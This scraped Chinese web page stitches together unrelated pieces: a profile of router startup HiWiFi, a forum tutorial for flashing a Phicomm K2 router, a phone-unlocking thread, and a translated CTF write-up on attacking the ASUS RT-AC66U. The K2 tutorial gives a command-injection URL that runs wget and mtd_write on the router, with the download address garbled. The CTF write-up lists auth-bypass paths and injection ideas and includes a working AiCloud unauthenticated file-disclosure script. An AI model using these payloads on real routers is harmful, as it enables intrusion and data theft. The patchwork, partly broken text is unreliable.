路由器连不上网 上的pou

您正在使用IE低版浏览器,为了您的雷锋网账号安全和更好的产品体验,强烈建议使用更快更安全的浏览器
极路由王楚云:活着比什么都重要
极路由能活到现在并成为一个品牌,王楚云觉得是个“奇迹”。All in2011年,王楚云在做微博营销,与“大众创业,万众创新”无关。当时他最大的苦恼就是公司的宽带网络:“中关村SOHO,1800一个月,带宽只有1M,还换不了。”为解决这个问题,他几乎尝试了所有常规及非常规的提速方式,最终在一台有USB口的路由器上刷了,将三大运营商的网络做负载均衡,达到了效果:“网费变成600,带宽变成10M。”大功告成,王楚云很得意,同时也闻到了商机。第一个电话打给大街网的前同事李恺:“我把办公室的网络解决了,路由器上面装了个Linux系统,你拿回去研究一下,看能不能一起搞搞。”李恺与王楚云的技术背景相同,“这种事情不用太多解释。”谁知,李恺一拿回去“就把固件刷死了”,而两人又对硬件一窍不通,王楚云便只好“上淘宝找了个哥们”修。事后一礼拜不到,李恺回应“可行”,“修路由的哥们”也成为了现在的同事。问题来了:这也许是个大机会,要不要“All in”?三重现实让王楚云的答案变成了“Yes”:几乎每个家庭都有路由器;TP在这个行业一家独大;路由器作为硬件入口是既定事实;那就找个卖点吧:“一开始大家的想法很简单,苹果在国内没有服务器,下载速度很慢,而当时iPhone在中国已经有了6000万用户,我们拿下十个点也就很牛X了。”事实证明,这个“点”很精确。只是人算不如天算,后来苹果为此在国内找了另一家公司。直至今日,王楚云依然感叹:“如果蓝汛和苹果的合作再晚上一年,那么我们会在这个市场获得更大的成功,苹果会找谁合作也就说不定了。”夹杂兴奋与野心,王楚云于2012年5月正式开始创业。出任CEO,找钱和找人显然比写代码更重要。唯二值得庆幸的是,当时国内的资本环境很好,而王楚云手中也已经有了产品原型。因此,过程谈不上艰苦,磕磕绊绊之后软硬件团队基本成型。尖叫实际上,在2013年3月发第一款产品——极壹——之前,王楚云已经先行论证了市场:“当时的硬件还没出来,我们已经靠刷机卖了几百台。刷的是TP-Link水星 330,成本大概是120,我们卖150。全卖给朋友,基本上靠口口相传,因为那种下载速度的提升是看得见的。”另外,小范围测试不仅吸引了朋友,也吸引了巨头。按照王楚云的说法,极路由差点就成为小米的第一家生态链公司。“雷总当时投了很多时间和精力,详细给我讲述从用户需求到产品上线等一整套过程的实施,包括供应链的管理。”至今,王楚云依然能清晰地记得第一次与雷军详谈极路由的时间——日。此时,距“极壹”推出还剩两个月,而蓝汛与苹果已经展开CDN方面的合作。换句话说,如果不另辟蹊径,极路由为苹果加速的优势将荡然无存。而“为了做出让用户尖叫的产品”,王楚云想到了翻墙和去广告。毋庸置疑,两者均够份量,同时又均担风险。事情的最终走向是:翻墙没做多久就被喊停,去广告也使极路由被爱奇艺告,赔偿40万。当然,王楚云对此事是有预期的,只不过在他眼中,“活着比什么都重要。”总之,“极壹”如其所愿地火了,并在很长一段时间内供不应求。膨胀整个2013年,极路由的出货量大概是10~15万台。如果无人作祟,这个数字原本可以更漂亮。“极壹”的芯片供应商是Atheros,Atheros最大的客户是TP-Link。一颗新星冉冉升起,巨头通过供应链的话语权对其进行遏制再正常不过。索求无门,突围无望。这也为一年后极路由获MTK战略投资埋下伏笔。对比另外两家主要竞争对手——、360路由器,极路由基本上没犯过狂下订单造成库存积压的错误。一方面,极路由资金受限;另一方面,王楚云也很怕作死自己:“他们是职业经理人,背后都有靠山,我们如果这么做了,基本上是死路一条。”所以,极路由的思路是:哪怕被反超,被压制,也不能拿命去“膨胀”,务实的做法应该是在可控的范围内通过各种手段卖货。其中就包括组建60人的销售团队,以及砸钱去做地铁广告。可事实证明,这么做还是太过激进,所以60人的销售团队从头到尾也仅存在了2个月。目前,“唯快不破”显然已经退出了王楚云的决策考量。据他透露,极路由如今的年出货量大概在百万左右。而在经历了商用WiFi、HiWiFi OS、家居等方面的探索之后,得出的结论可能会让互联网人不屑:卖货赚钱。在这种指导方针下,2015年发布299元的极路由3,以及今年发布399元的极路由4就不足为奇了。尾声早在“All in”之前,王楚云其实就对路由器行业有个很宏大的愿景——去中心服务器,重构整个网络结构。“这在理论上是可行的”,如今的他也依然深信这一点。可不同的是,4年的时间过去了,向着目标狂奔带来的兴奋已经消逝,极路由的工作模式也变成了在一个固定的销售目标下各司其职。不够互联网无所谓,有人走就互相祝愿。总之,在王楚云心中:“活着才是最重要的。”
同步到新浪微博
关注产品和创新的科技媒体
当月热门文章
¥0(免费上门 手机快修)
本栏目由提供
为了您的账户安全,请
您的邮箱还未验证,完成可获20积分哟!
您的账号已经绑定,现在您可以以方便用邮箱登录您尚未登录,请登陆后浏览更精彩内容!
Powered by请登陆后使用
只需一步,快速开始
吧友自助信息发布区,请自行甄别
查看: 6317|回复: 31
转52 斐讯K2路由器 4.5.5固件最傻瓜刷机教程
斐讯K2 4.5.5固件无需开启telnet ! 免拆机!免TTL! 无需下载任何工具!刷华硕固件。
首先路由器能正常上网。正常上网。正常上网。记住要用线刷,线刷,线刷。
然后用浏览器打开这个网址,如果默认ip不是192.168.2.1修改一下。
[Asm] [color=rgb(51, 102, 153) !important]纯文本查看 [color=rgb(51, 102, 153) !important]复制代码
[backcolor=rgb(27, 36, 38) !important][color=white !important][color=white !important]
http://192.168.2.1/goform/gra_NTPSyncWithLocal?text_year=&2016|`if wget -O /tmp/breed.bin
mtd_write write /tmp/breed.bin Becho breed ok! &/etc_ro/web/index.fi`&
过一会,过一会,看到页面没反映的时候。[color=rgb(68, 68, 68) !important]重新登陆路由 会显示breed ok! 就证明刷breed成功了,重启随意刷机吧!
开机之前按Reset键,然后插上电源过一会在松开。大概5-6秒把,稍等一会,再在电脑浏览器中进入192.168.1.1,便可进入Breed控制台:点固件更新,固件那个打勾,然后选择文件RT-AC54U-GPIO-1-PSG.4.3.9-099.trx,自动重启勾上,让后点上传。大概2分钟就搞定了。undefined(只要刷上breed就说明你的路由器再怎么刷固件都不会砖了把)很简单的。
华硕固件链接: 密码:fxeu
<p id="rate_919" onmouseover="showTip(this)" tip="又放水了?太谢谢你了,火速去抢&果果 + 3
" class="mtn mbn">
开机一直红灯。 ASUS信号有就是没网啊
刷好了,谢谢!
Powered by后使用快捷导航没有帐号?
只需一步,快速开始
查看: 5130|回复: 36
在线时间390 小时经验值91 最后登录注册时间帖子阅读权限30UID5343077
初中生, 积分 91, 距离下一级还需 9 积分
该用户从未签到
G币4 最后登录注册时间
马上注册,结交更多机友,下载更多应用,让你轻松玩转手机。
已有帐号?   下载游戏和软件,请【】进入机锋市场!
这个机子要啥时候才能有第三方包和root啊,还有就是有大神知道这机子电信4g能上网但是打不进电话怎么解决吗
<p id="rate_031395" onmouseover="showTip(this)" tip="加QQ 我教你解决&经验值 + 1
" class="mtn mbn">
在线时间390 小时经验值91 最后登录注册时间帖子阅读权限30UID5343077
初中生, 积分 91, 距离下一级还需 9 积分
该用户从未签到
G币4 最后登录注册时间
顶啊,别沉啊
在线时间0 小时经验值974 最后登录注册时间帖子阅读权限70UID
学士, 积分 974, 距离下一级还需 126 积分
TA的每日心情难过 02:10签到天数: 40 天[LV.5]常住居民I
G币74 最后登录注册时间
不会有,不用想了
在线时间0 小时经验值906 最后登录注册时间帖子阅读权限70UID
学士, 积分 906, 距离下一级还需 194 积分
TA的每日心情慵懒 21:20签到天数: 94 天[LV.6]常住居民II
G币691 最后登录注册时间
不会有 root有大神的话可能会有 现在想要root只能找万能的x宝
在线时间1119 小时经验值2976 最后登录注册时间帖子阅读权限100UID1806074
博士, 积分 2976, 距离下一级还需 524 积分
TA的每日心情开心 08:37签到天数: 3 天[LV.2]偶尔看看I
G币393 最后登录注册时间
基本用考虑会有,,
K700C rock E1 E2 E398 E750 E6 MB200&&Galaxy SII HD LTE
C8815 IP4&&5891 LS970 VS980 VS 985 NEXUS 6&&N920P
在线时间0 小时经验值20 最后登录注册时间帖子阅读权限20UID
小学生, 积分 20, 距离下一级还需 30 积分
该用户从未签到
G币1 最后登录注册时间
只能重刷五件套解决,不懂得可以问我,QQ.
在线时间0 小时经验值1001 最后登录注册时间帖子阅读权限1UID
头像被屏蔽
该用户从未签到
G币0 最后登录注册时间
提示: 作者被禁止或删除 内容自动屏蔽
在线时间16 小时经验值148 最后登录注册时间帖子阅读权限40UID1902440
高中生, 积分 148, 距离下一级还需 52 积分
TA的每日心情开心 00:17签到天数: 1 天[LV.1]初来乍到
G币29 最后登录注册时间
目前N920V【破4g,只需要替换频点文件,然后每次开机都要打个电话出去,你现在的问题就是1X没有在线待机,破解不彻底,所以别人打不进。
在线时间390 小时经验值91 最后登录注册时间帖子阅读权限30UID5343077
初中生, 积分 91, 距离下一级还需 9 积分
该用户从未签到
G币4 最后登录注册时间
L10741 发表于
目前N920V【破4g,只需要替换频点文件,然后每次开机都要打个电话出去,你现在的问题就是1X没有在线待机, ...
能留个QQ吗,有偿求助
在线时间390 小时经验值91 最后登录注册时间帖子阅读权限30UID5343077
初中生, 积分 91, 距离下一级还需 9 积分
该用户从未签到
G币4 最后登录注册时间
有偿求助,求解决电信4g打不进电话问题。
Powered by当前位置: && 知识详情
CTF:华硕RT-AC66U路由器漏洞解题分析
来源:360安全播报
阅读:31813次
我对EFF的开放无线路由活动很感兴趣,但是他们一点都没有对他们的设备进行展示。比赛规则中RT-AC66U被列为可能被用来攻击的设备。我有一个个人的RT-AC66U,因此我决定为所有CTF的参赛者写一个小教程。侦查第一步,需要找到固件和源代码。幸运的是,RT-AC66U在GPL注册过,很容易就可以找到固件的源代码。为了更好地分析调制解调器,我们弄来了固件和源代码v3.0.0.4.266到v3.0.0.4.376.1123版本。这两个版本之间有很多的更新,因此,我们看一看这其中都有哪些变化。Asus RT-AC66u v3.0.0.4.266 – прошивкаhttp://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/FW_RT_AC66U_VER3004266.zip&按照比赛规则,我们应当找到0day漏洞并运用它。应当结合不同的漏洞去找到更多的弱点。如果开发者不公布的漏洞但是被你发现了,就叫做0day漏洞。&总之,我们拥有源代码,是时候打开并研究它了。CTF Field Guide 拥有丰富的代码审计资源。可以使用对比软件,比如Windows系统下的Beyond Compare,Araxis Merge 和 WinMerge , 如果你的系统是Linuxили ,你可以用Meld。下面,打开目录&/asuswrt/release/src/router/&,在Meld下比较两个版本。这个路由器上有很多已被发现的漏洞,如果你想找到0day,请你确信,它是不会主动找你的。以下是几个现成的漏洞:ASUS RT-AC66U Remote Root (Broadcom ACSD).br/2013/07/exploit-asus-rt-ac66u-remote-root.htmlASUS RT-N66U Router — HTTPS Directory traversal and full file access and credential disclosure vuln/archive/1/526942Asus RT56U Remote Command Injectionhttps://hatriot.github.io/blog//asus-rt56u-remote-command-injection/Taking over the ASUS RT-N56U and RT-AC66U/knowledge/case_studies/routers/asus_rtn56u.phpDear Asus router user: You’ve been pwned, thanks to easily exploited flaw (Asusgate)/security/2014/02/dear-asus-router-user-youve-been-pwned-thanks-to-easily-exploited-flaw/OSVDB/search?search%5Bvuln_title%5D=asus&search%5Btext_type%5D=alltext如果你利用漏洞攻击需要特别的系统配置或者专业的信息,你得换一定数量的攻击点。因此,如果你想选取很多攻击点,你应该瞄准进程和服务标准的系统。&&在RT-AC66U的USB应用界面中可以开启一些服务,比如FTP, DLNA, NFS 和Samba.MiniDLNA也是一个很棒的目标。使用Zachary Cutlip&#39;的研究成果,可以轻松在MiniDLNA中找到很多漏洞,他曾多次破解这个程序。AiCloud潜在的拥有其他的漏洞服务,它可以把你的家庭网络与在线存储连接起来,并为无线设备提供接口。当小组的一部分研究源代码时, forensics的专家通过binwalk 和 fmk研究固件。你要记住binwally,这个软件是我写的,一个通过模糊哈希算法的方式找出两个二进制树之间差异的软件。在Binwalk中有对文件和目录进行模糊哈希算法的选项。大多数开发者(比如Asus)都不会公开所有源代码。看来,大家不得不转向驱动程序和二进制文件,以便找到好用的漏洞。名为ACSD的驱动软件更让人感兴趣,因为它的新版本(v3.0.0.4.374.130+)由于漏洞(Jacob Holcomb发现的)被删除了。MIPS Little Endian的驱动程序同时,重要的是要弄清楚更多地系统文件。在OpenWRT Wiki有一片著名的关于标记闪存的文章(链接про разметку флеш-памяти)。在Linux中MTD(内存技术设备)为闪存设备提供接口,并允许在其中建立符合要求的系统文件。可以通过ssh进入设备并查看标记。分析NVRAM对于我们十分有价值,其中存储着所有的设备设置情况。你可以通过提交所需的目录(mtd1)或者执行nvram show命令就能查看它的内容。&&&&&Pmon——也是一个有趣的目录。其中包含着被LZMA压缩的数据,这些数据用于固件更新失败后的恢复。攻击攻击时间开始了。我们需要一些诸如gdb,gdbserver和strace的软件进行二进制调试。我们可以对其或者进行交叉编译,或者调试 Optware/Entware以及对已编译的软件包进行设置。Wanduck(GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/rc/wanduck.c)对于分析来说十足是一个有趣的进程。它无需启动,在18017端口提供伪HTTP服务。这种HTTP服务每一个请求重定向于主要接口,由于某种原因,它可以抛弃所有终止在 &.ico&的请求。让我们分析一下,他为什么这么运行——远程启动gdbserver(gdbserver --multi localhost:12345 &) ,并且他能把任何调试器与你的决定联系在一起。如果你使用 IDA Pro,你可以打开二进制文件并在<>上设置进程类型。找到handle_http_req模块,并设置断点对比dst_url。把gdbserver的主机和端口导入Debugger / Process Options菜单,并添加所需的PID继续完成进程 (F9),并在192.168.1.1/x.ico完成http请求。调试器在断点处停止,你将会看到目录和内存。&如果你想找到侦察的其他目标,你可以在GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/的<>目录中找。会找到一些有意思的二进制文件。/acsd/prebuilt/acsd
/webdav_client/prebuilt/webdav_client
/asuswebstorage/prebuilt/asuswebstorage
/eapd/linux/prebuilt/eapd
/nas/nas/prebuilt/nas
/flash/prebuilt/flash
/et/prebuilt/et
/wps/prebuilt/wps_monitor
/ated/prebuilt/ated
/wlconf/prebuilt/wlconf 通过手机软件AiCloud可以看到设备工作的一些有价值的信息。如果你进行反编译apk或者使用代理劫持,你可以得到软件初始的http请求。&&&&&有没有注意到ddns_hostname奇怪的变量。密码破解任务。&密码破解通过使用服务,POST请求试图记录的设备上的新Dynamic DNS地址。如果我们能找到RT-AC66U源代码的这一行,那么我们就可以轻松的找到产生DDNS地址的功能。var isMD5DDNSName = function(){ var macAddr = &#39;&% nvram_get(&lan_hwaddr&); %&&#39;.toUpperCase().replace(/:/g, &&); return &A&+hexMD5(macAddr).toUpperCase()+&.&; }&通过查询WikiDev,RT-AC66U在MAC地址中使用以下标识码:08:60:6E&(1&E,&1&W,&2011)
10:BF:48&(1&E,&2&W,&2011)
30:85:A9&(3&E,&3&W,&2011)
50:46:5D&(1&E,&2&W,&2012) 利用这些信息,我们能够比较AiCloud上的每一个路由器上的IP地址。简单地列出所有可能的IP地址的列表并使用技巧挑选出名为mubix&#39;а的DNS地址(/blog//hostname-bruteforcing-on-the-cheap/)&&如果你实在懒得输命令,你可以在 Shodan 上面找<> 。&&&&&&AiCloud默认端口。事实上任何人都能轻松地得到进行这项服务的路由器的列表,这应该引起我们的担心,不是吗?用于产生WPS PIN的算法解析是另一个有价值的密码行为。你可以通过命令nvram show | grep -E secret_code|wps_device_pin,得到当时的PIN和 secret_code。在源代码中找到这些数值并用得到的信息些一个注册机(不要忘了从 pouet.net上给它添加一个CHIPTUNE)。&&&&&你还可以检查设备产生的密钥熵。看一下幻灯片<>,这样可以产生多个思路。&&WEB有很多进行web渗透测试的方法,我只偏爱其中两个。路由器的界面对CSRF(Cross-site request forgery跨站请求伪造)没有任何防护。同时有很多ping命令中的传统注入和一堆XSS向量。HTTP连接程序建立在microhttpd基础上。这里有退出httpd.c目录的基础防护。&&&&&&&我们可以参照идею hackerfantastic 中的一些方法来对付遍布的潜在的防护措施。#include&&stdio.h&
#include&&string.h&
int&main(int&argc,&char&*argv[]){
&&&&char&*
&&&&file&=&argv[1];
&&&&len&=&strlen(file);
&&&&if&(&file[0]&==&&#39;/&#39;&||&strcmp(&file,&&..&&)&==&0&||&strncmp(&file,&&../&,&3&)&==&0&||&strstr(&file,&&/../&&)&!=&(char*)&0&||&strcmp(&&(file[len-3]),&&/..&&)&==&0&)
&&&&&&&&printf&(&Illegal&filename:&&%s\n&,&file);
&&&&&&&&printf&(&Accepted&filename:&%s\n&,&file);
&&&&return&0;
}&&&&在web程序中有很多(应当被去掉的)MIME(Multipurpose Internet Mail Extensions多用途互联网邮件扩展类型)的处理程序。//&some&should&be&removed
struct&except_mime_handler&except_mime_handlers[]&=&{
{&&QIS_*&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},&&&&&&
{&&qis/*&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},&&&&&&
{&&*.css&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&state.js&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&detect.js&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&popup.js&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&general.js&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&help.js&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&start_autodet.asp&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&start_apply.htm&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&start_apply2.htm&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&setting_lan.htm&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&httpd_check.htm&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&status.asp&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&automac.asp&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&detecWAN.asp&,&MIME_EXCEPTION_NORESETTIME},
{&&detecWAN2.asp&,&MIME_EXCEPTION_NORESETTIME},
{&&WPS_info.asp&,&MIME_EXCEPTION_NORESETTIME},
{&&WAN_info.asp&,&MIME_EXCEPTION_NOAUTH_ALL|MIME_EXCEPTION_NORESETTIME},
{&&result_of_get_changed_status.asp&,&MIME_EXCEPTION_NORESETTIME},
{&&result_of_get_changed_status_QIS.asp&,&MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{&&result_of_detect_client.asp&,&MIME_EXCEPTION_NORESETTIME},
{&&Nologin.asp&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&alertImg.gif&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&error_page.htm&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&jquery.js&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&gotoHomePage.htm&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&update_appstate.asp&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&update_cloudstatus.asp&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&get_webdavInfo.asp&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&*.gz&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&*.tgz&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&*.zip&,&MIME_EXCEPTION_NOAUTH_ALL},
{&&*.ipk&,&MIME_EXCEPTION_NOAUTH_ALL},
{&NULL,&0&}
}; get_webdavInfo.asp文件无需认证就能被通过并弹出关于设备和网络的大量信息。&为了在页面中设置XSS后门,我们可以在nvram中更改一些变量值。&&&一些活动使用了nvram_get 和 nvram_safe_get的功能。设备中的设置可以通过nvram_set的功能进行存储。如果路由器不对来自NVRAM的数据进行屏蔽,那么可以进行一些诸如NVRAM 注射的攻击(在这项工作中%0A, %0D 和 “reboot”会对你有帮助)。&AiCloud——非常脆弱的服务,其漏洞可以轻松被开发运用(详见/archive/1/526942)。你在设置中激活它,lighttpd就通过路由器的8082端口(新版本固件在443端口)打开并为你的在线文件提供出口。向URL添加/smb/(读源代码)& ,就能绕过登陆用户名与口令对话框。&&为利用RT-AC66U v3.0.0.4.266版本中Aicloud的这个bug,我写了个小脚本。它能够监控路由器传输的所有的文件和线路,其中包括USB线路的。#!/usr/bin/python
from&bs4&import&BeautifulSoup
import&urllib2
import&sys
def&list_dir(url,&start_dir):
&&&&&&&&html_page&=&urllib2.urlopen(url+start_dir)
&&&&except&urllib2.HTTPError&as&e:
&&&&&&&&print&e
&&&&&&&&sys.exit(1)
&&&&soup&=&BeautifulSoup(html_page)
&&&&for&link&in&soup.findAll(&#39;a&#39;):
&&&&&&&&path&=&link.get(&#39;uhref&#39;)
&&&&&&&&if&path&!=&&#39;../&#39;:
&&&&&&&&&&&&is_dir&=&link.get(&#39;isdir&#39;)
&&&&&&&&&&&&if&&is_dir&==&str(&#39;1&#39;):
&&&&&&&&&&&&&&&&print&url+path
&&&&&&&&&&&&&&&&list_dir(url,path)
&&&&&&&&&&&&else:
&&&&&&&&&&&&&&&&print&url+path
nargs&=&len(sys.argv)
if&nargs&==&2:
&&&&url&=&sys.argv[1]
&&&&start_dir&=&&/smb&
elif&nargs&==&3:
&&&&url&=&sys.argv[1]
&&&&start_dir&=&str(sys.argv[2])
&&&&print&&#39;Asus&RT-AC66U&AiCloud&Unauthenticated&File&Disclosure\
&&&&&&&&&&\nTested&Firmwares:&3.0.0.4.266,&3.0.0.4.270&and&3.0.0.4.354\
&&&&&&&&&&\nDisclosed&by&Kyle&Lovett\
&&&&&&&&&&\nScript&by&Bernardo&Rodrigues&-&\
&&&&&&&&&&\nUsage:&python&%s&http://url&[path]&#39;&%&sys.argv[0]
&&&&sys.exit(1)
list_dir(url,&start_dir)&最后,别忘了比较www目录中文件的差别。通过这种方式能找到用于web界面的所有组件和脚本。&&为什么不尝试一下在不损坏保修封印的情况下打开路由器的盖?为此你需要来自DEFCON Tamber Evident Village的伙伴的主意。&结尾
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
参与讨论,请先
安全播报APP
Copyright & 360网络攻防实验室 All Rights Reserved 京ICP证080047号[京ICP备号-6]

我要回帖

更多关于 路由器连不上网 的文章

 

随机推荐